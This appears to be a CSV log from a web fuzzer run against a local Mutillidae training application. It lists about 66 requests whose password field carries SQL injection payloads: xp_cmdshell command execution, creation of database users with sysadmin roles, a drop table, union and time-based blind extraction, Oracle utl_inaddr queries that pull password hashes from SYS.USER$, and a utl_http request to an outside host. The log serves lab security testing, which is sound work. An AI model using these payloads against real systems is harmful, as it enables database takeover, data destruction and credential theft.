Task ID,Message Type,Req. Timestamp,Method,URL,Code,Reason,RTT,Size Req. Header,Size Req. Body,Size Resp. Header,Size Resp. Body,Highest Alert,State,Payloads
0,Original,Thu Jun 23 03:40:33 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=sania&user-info-php-submit-button=View+Account+Details,200,OK,65,650,0,430,55816,Medium,,[]
1,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--&user-info-php-submit-button=View+Account+Details,200,OK,70,699,0,430,57407,,,['; exec master..xp_cmdshell 'ping 10.10.1.2'--]
2,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=create%20user%20name%20identified%20by%20'pass123'&user-info-php-submit-button=View+Account+Details,200,OK,110,695,0,430,57356,,,[create user name identified by 'pass123']
4,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20;%20drop%20table%20temp%20--&user-info-php-submit-button=View+Account+Details,200,OK,152,677,0,430,57348,,,[' ; drop table temp --]
5,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=exec%20sp_addlogin%20'name'%20,%20'password'&user-info-php-submit-button=View+Account+Details",200,OK,199,689,0,430,57372,,,"[exec sp_addlogin 'name' , 'password']"
3,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=create%20user%20name%20identified%20by%20pass123%20temporary%20tablespace%20temp%20default%20tablespace%20users;%20&user-info-php-submit-button=View+Account+Details,200,OK,230,760,0,430,55672,,,[create user name identified by pass123 temporary tablespace temp default tablespace users; ]
6,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=exec%20sp_addsrvrolemember%20'name'%20,%20'sysadmin'&user-info-php-submit-button=View+Account+Details",200,OK,209,697,0,429,57380,,,"[exec sp_addsrvrolemember 'name' , 'sysadmin']"
7,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=insert%20into%20mysql.user%20(user,%20host,%20password)%20values%20('name',%20'localhost',%20password('pass123'))&user-info-php-submit-button=View+Account+Details",200,OK,194,758,0,429,57855,,,"[insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))]"
8,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=grant%20connect%20to%20name;%20grant%20resource%20to%20name;&user-info-php-submit-button=View+Account+Details,200,OK,185,705,0,429,55672,,,[grant connect to name; grant resource to name;]
9,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=insert%20into%20users(login,%20password,%20level)%20values(%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72)%20+%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72),char(0x64)&user-info-php-submit-button=View+Account+Details",200,OK,168,881,0,429,55672,,,"[insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)]"
10,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=a&user-info-php-submit-button=View+Account+Details,200,OK,160,646,0,429,55672,,Reflected,[a]
11,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20or%201=1%20--&user-info-php-submit-button=View+Account+Details,200,OK,173,662,0,429,57472,,Reflected,[' or 1=1 --]
12,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20@@version)%20--&user-info-php-submit-button=View+Account+Details,200,OK,181,682,0,429,57553,,,[' union (select @@version) --]
13,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20NULL,%20(select%20@@version))%20--&user-info-php-submit-button=View+Account+Details",200,OK,201,701,0,429,57379,,,"[' union (select NULL, (select @@version)) --]"
14,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20NULL,%20NULL,%20(select%20@@version))%20--&user-info-php-submit-button=View+Account+Details",200,OK,219,709,0,429,57385,,,"[' union (select NULL, NULL, (select @@version)) --]"
15,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--&user-info-php-submit-button=View+Account+Details",200,OK,251,720,0,429,57665,,,"[' union (select NULL, NULL, NULL,  (select @@version)) --]"
16,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--&user-info-php-submit-button=View+Account+Details",200,OK,240,728,0,429,57689,,,"[' union (select NULL, NULL, NULL, NULL,  (select @@version)) --]"
17,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20NULL,%20(select%20@@version))%20--&user-info-php-submit-button=View+Account+Details",200,OK,232,736,0,429,57713,,,"[' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --]"
18,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=a&user-info-php-submit-button=View+Account+Details,200,OK,230,646,0,429,55672,,Reflected,[a]
19,Fuzzed,Thu Jun 23 03:41:36 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not(substring((select%20@@version),25,1)%20%3C%3E%200)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details",200,OK,217,742,0,429,57807,,,"['; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --]"
20,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not(substring((select%20@@version),25,1)%20%3C%3E%205)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details",200,OK,206,742,0,429,57807,,,"['; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --]"
21,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not(substring((select%20@@version),25,1)%20%3C%3E%208)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details",200,OK,214,742,0,429,57807,,,"['; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --]"
22,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not(substring((select%20@@version),24,1)%20%3C%3E%201)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details",200,OK,223,742,0,429,57807,,,"['; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --]"
23,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not(select%20system_user)%20%3C%3E%20'sa'%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details,200,OK,221,729,0,429,57475,,,['; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --]
24,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20is_srvrolemember('sysadmin')%20%3E%200%20waitfor%20delay%20'0:0:2'%20--%20&user-info-php-submit-button=View+Account+Details,200,OK,256,729,0,429,57476,,,['; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- ]
25,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20%3C%3E%201)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details,200,OK,266,759,0,429,57545,,,['; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --]
26,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20%3C%3E%200)%20waitfor%20delay%20'0:0:2'%20--&user-info-php-submit-button=View+Account+Details,200,OK,280,759,0,429,57545,,,['; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --]
27,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1&user-info-php-submit-button=View+Account+Details,200,OK,282,646,0,429,55672,,Reflected,[1]
28,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1'1&user-info-php-submit-button=View+Account+Details,200,OK,290,648,0,429,57433,,Reflected,[1'1]
29,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20exec%20sp_%20(or%20exec%20xp_)&user-info-php-submit-button=View+Account+Details,200,OK,271,679,0,429,55672,,,[1 exec sp_ (or exec xp_)]
30,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20and%201=1&user-info-php-submit-button=View+Account+Details,200,OK,254,658,0,429,55672,,,[1 and 1=1]
31,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1'%20and%201=(select%20count(*)%20from%20tablenames);%20--&user-info-php-submit-button=View+Account+Details,200,OK,248,703,0,429,57386,,,[1' and 1=(select count(*) from tablenames); --]
32,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=a&user-info-php-submit-button=View+Account+Details,200,OK,240,646,0,429,55672,,Reflected,[a]
33,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20or%201=1&user-info-php-submit-button=View+Account+Details,200,OK,243,657,0,429,55672,,,[1 or 1=1]
34,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1'%20or%20'1'='1&user-info-php-submit-button=View+Account+Details,200,OK,309,661,0,429,61171,,,[1' or '1'='1]
35,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20and%20user_name()%20=%20'dbo'&user-info-php-submit-button=View+Account+Details,200,OK,335,678,0,429,57539,,,[1 and user_name() = 'dbo']
36,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1&user-info-php-submit-button=View+Account+Details,200,OK,323,646,0,429,55672,,Reflected,[1]
37,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20and%20user_name()%20=%20'dbo'&user-info-php-submit-button=View+Account+Details,200,OK,326,678,0,429,57539,,,[1 and user_name() = 'dbo']
38,Fuzzed,Thu Jun 23 03:41:37 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=%5C';%20desc%20users;%20--&user-info-php-submit-button=View+Account+Details,200,OK,323,671,0,429,55672,,,[\'; desc users; --]
39,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%5C'1&user-info-php-submit-button=View+Account+Details,200,OK,243,651,0,429,55672,,,[1\'1]
40,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1'%20and%20non_existant_table%20=%20'1&user-info-php-submit-button=View+Account+Details,200,OK,234,683,0,429,57247,,,[1' and non_existant_table = '1]
41,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20or%20username%20is%20not%20NULL%20or%20username%20=%20'&user-info-php-submit-button=View+Account+Details,200,OK,300,704,0,429,61171,,,[' or username is not NULL or username = ']
42,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20and%20ascii(lower(substring((select%20top%201%20name%20from%20sysobjects%20where%20xtype='u'),%201,%201)))%20%3E%20116&user-info-php-submit-button=View+Account+Details",200,OK,299,767,0,429,57468,,,"[1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116]"
43,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20union%20all%20select%201,2,3,4,5,6,name%20from%20sysobjects%20where%20xtype%20=%20'u'%20--&user-info-php-submit-button=View+Account+Details",200,OK,304,739,0,429,57390,,,"[1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --]"
44,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=1%20uni/**/on%20select%20all%20from%20where&user-info-php-submit-button=View+Account+Details,200,OK,315,688,0,429,55672,,,[1 uni/**/on select all from where]
45,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password=%20or%201=1&user-info-php-submit-button=View+Account+Details,200,OK,316,656,0,429,55672,,,[ or 1=1]
46,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20or%20'1'='1&user-info-php-submit-button=View+Account+Details,200,OK,307,660,0,429,61171,,,[' or '1'='1]
47,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%7C%7Cutl_http.request('httP://192.168.1.1/')%7C%7C'&user-info-php-submit-button=View+Account+Details,200,OK,341,698,0,429,57617,,,['||utl_http.request('httP://192.168.1.1/')||']
48,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20%7C%7C%20myappadmin.adduser('admin',%20'newpass')%20%7C%7C%20'&user-info-php-submit-button=View+Account+Details",200,OK,348,711,0,429,57408,,,"[' || myappadmin.adduser('admin', 'newpass') || ']"
49,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20banner%20FROM%20v$version%20WHERE%20ROWNUM=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,359,756,0,429,57700,,,[' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i]
50,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20SYS.LOGIN_USER%20FROM%20DUAL))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,380,740,0,429,57761,,,[' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i]
51,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20SYS.DATABASE_NAME%20FROM%20DUAL))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,339,743,0,429,57434,,,[' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i]
52,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20host_name%20FROM%20v$instance))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,329,741,0,429,57329,,,[' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i]
53,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20global_name%20FROM%20global_name))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,313,744,0,429,57670,,,[' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i]
54,Fuzzed,Thu Jun 23 03:41:38 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(USERNAME))%20FROM%20SYS.ALL_USERS))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,324,760,0,429,57725,,,[' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i]
55,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(PASSWORD))%20FROM%20SYS.USER$))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,322,756,0,429,57705,,,[' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i]
56,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(table_name))%20FROM%20sys.all_tables))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,325,763,0,429,57359,,,[' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i]
57,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(column_name))%20FROM%20sys.all_tab_columns))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,387,769,0,429,57370,,,[' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i]
58,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20COUNT(DISTINCT(GRANTED_ROLE))%20FROM%20DBA_ROLE_PRIVS%20WHERE%20GRANTEE=SYS.LOGIN_USER))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details,200,OK,397,798,0,429,57872,,,[' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i]
59,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,420,833,0,429,57593,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i]"
60,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,399,829,0,429,57590,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i]"
61,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,412,838,0,429,58140,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i]"
62,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(column_name)%20FROM%20(SELECT%20DISTINCT(column_name),%20ROWNUM%20AS%20LIMIT%20FROM%20all_tab_columns)%20WHERE%20LIMIT=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,355,841,0,429,57603,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i]"
63,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(granted_role)%20FROM%20(SELECT%20DISTINCT(granted_role),%20ROWNUM%20AS%20LIMIT%20FROM%20dba_role_privs%20WHERE%20GRANTEE=SYS.LOGINUSER)%20WHERE%20LIMIT=1))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,372,874,0,429,58294,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i]"
64,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(USERNAME)%20FROM%20(SELECT%20DISTINCT(USERNAME),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_USERS)%20WHERE%20LIMIT=2))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,325,833,0,429,57593,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i]"
65,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS.USER$)%20WHERE%20LIMIT=2))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,336,829,0,429,57590,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i]"
66,Fuzzed,Thu Jun 23 03:41:39 CDT 2022,GET,"http://localhost/mutillidae/index.php?page=user-info.php&username=sania&password='%20AND%201=utl_inaddr.get_host_address((SELECT%20DISTINCT(table_name)%20FROM%20(SELECT%20DISTINCT(table_name),%20ROWNUM%20AS%20LIMIT%20FROM%20sys.all_tables)%20WHERE%20LIMIT=2))%20AND%20'i'='i&user-info-php-submit-button=View+Account+Details",200,OK,315,838,0,429,58140,,,"[' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i]"